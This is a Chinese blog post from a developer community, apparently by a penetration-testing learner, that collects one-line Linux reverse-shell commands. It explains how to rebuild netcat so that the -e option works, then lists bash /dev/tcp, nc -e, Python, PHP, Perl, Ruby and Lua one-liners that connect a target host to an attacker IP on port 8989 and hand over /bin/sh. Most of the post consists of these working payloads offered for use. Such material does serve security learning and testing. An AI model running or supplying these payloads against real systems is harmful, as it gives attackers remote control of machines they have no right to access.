开发者社区> spleated> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

linux一句话反弹shell

简介: 参考文献:https://www.anquanke.com/post/id/87017 实验环境: 阿里云服务器:120.xxx.xxx.xx(开启了8989端口) 内网ubuntu:192.xxx.xx.xxx(无外网ip不可直接访问) 安装netcat 默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以需要手动下载二进制安装包。
+关注继续查看

参考文献:https://www.anquanke.com/post/id/87017

实验环境:

阿里云服务器:120.xxx.xxx.xx(开启了8989端口)
内网ubuntu:192.xxx.xx.xxx(无外网ip不可直接访问)

安装netcat

默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以需要手动下载二进制安装包。

下载安装包:
#wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certifica
解压:
#tar -xvzf netcat-0.7.1.tar.gz
编译安装:
/netcat-0.7.1# ./configure
/netcat-0.7.1# make
/netcat-0.7.1# make install
/netcat-0.7.1# make clean

1.使用bash命令反弹

1.1先在服务器上监听8989端口
nc -l -p 8989
1.2在目标机器上执行以下命令

bash -i >& /dev/tcp/120.xxx.xxx.xx/8989 0>&1
bash -i:产生一个bash交互环境
>&:将联合符号前面的内容与后面相结合然后一起重定向给后者
/dev/tcp/120.xxx.xxx.xx/8989:让攻击方与目标主机建立tcp链接
0>&1:将`标准的输入`与`标准输出`内容相结合,然后重定向给前面`标准输出`内容

2.使用nc反弹

2.1先在服务器上监听8989端口
nc -l -p 8989
2.2在目标机器上执行以下命令
nc -e /bin/sh 120.xxx.xxx.xx 8989

3.一句话反弹shell

3.1python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.xxx.xxx.xxx",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3.2php

php -r '$sock=fsockopen("120.xxx.xxx.xxx",8989);exec("/bin/sh -i <&3 >&3 2>&3");'

3.3perl

perl -e 'use Socket;$i="120.xxx.xxx.xxx";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3.4ruby

ruby -rsocket -e'f=TCPSocket.open("120.xxx.xxx.xxx",8989).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

3.5lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('120.xxx.xxx.xxx','8989');os.execute('/bin/sh -i <&3 >&3 2>&3');"

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Linux Shell常用技巧(四)
九.  awk实用功能:    和sed一样,awk也是逐行扫描文件的,从第一行到最后一行,寻找匹配特定模板的行,并在这些行上运行“选择”动作。如果一个模板没有指定动作,这些匹配的行就被显示在屏幕上。如果一个动作没有模板,所有被动作指定的行都被处理。
714 0
Linux Shell常用技巧(五)
十一.  awk编程:    1.  变量:    在awk中变量无须定义即可使用,变量在赋值时即已经完成了定义。变量的类型可以是数字、字符串。根据使用的不同,未初始化变量的值为0或空白字符串" ",这主要取决于变量应用的上下文。
633 0
Linux Shell常用技巧(一)
一.    特殊文件: /dev/null和/dev/tty    Linux系统提供了两个对Shell编程非常有用的特殊文件,/dev/null和/dev/tty。其中/dev/null将会丢掉所有写入它的数据,换句换说,当程序将数据写入到此文件时,会认为它已经成功完成写入数据的操作,但实际上什么事都没有做。
777 0
Linux Shell常用技巧(七)
十六. 文件查找命令find:    下面给出find命令的主要应用示例:    /> ls -l     #列出当前目录下所包含的测试文件    -rw-r--r--. 1 root root 48217 Nov 12 00:57 install.
764 0
Linux Shell常用技巧(十)
二十. 通过管道组合Shell命令获取系统运行数据:     1.  输出当前系统中占用内存最多的5条命令:    #1) 通过ps命令列出当前主机正在运行的所有进程。    #2) 按照第五个字段基于数值的形式进行正常排序(由小到大)。
1324 0
Linux Shell常用技巧(十一)
二十二. 交互式使用Bash Shell:    1.  用set命令设置bash的选项:    下面为set主要选项的列表及其表述: 选项名 开关缩写 描述 allexport -a 打开此开关,所有变量都自动输出给子Shell。
705 0
Linux Shell常用技巧(二)
七. grep家族:       1.  grep退出状态:    0: 表示成功;    1: 表示在所提供的文件无法找到匹配的pattern;    2: 表示参数中提供的文件不存在。    见如下示例:    /> grep 'root' /etc/passwd    root:x:0:0:r...
678 0
Linux Shell常用技巧(十二)
二十三. Bash Shell编程:    1.  读取用户变量:    read命令是用于从终端或者文件中读取输入的内建命令,read命令读取整行输入,每行末尾的换行符不被读入。在read命令后面,如果没有指定变量名,读取的数据将被自动赋值给特定的变量REPLY。
790 0
Linux Shell常用技巧(八)
十八.  和系统运行状况相关的Shell命令:    1.  Linux的实时监测命令(watch):    watch 是一个非常实用的命令,可以帮你实时监测一个命令的运行结果,省得一遍又一遍的手动运行。
736 0
Linux Shell常用技巧(九)
十九.  和系统运行进程相关的Shell命令:       1.  进程监控命令(ps):    要对进程进行监测和控制,首先必须要了解当前进程的情况,也就是需要查看当前进程,而ps命令就是最基本同时也是非常强大的进程查看命令。
709 0
+关注
spleated
渗透测试入门的小白一只
71
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载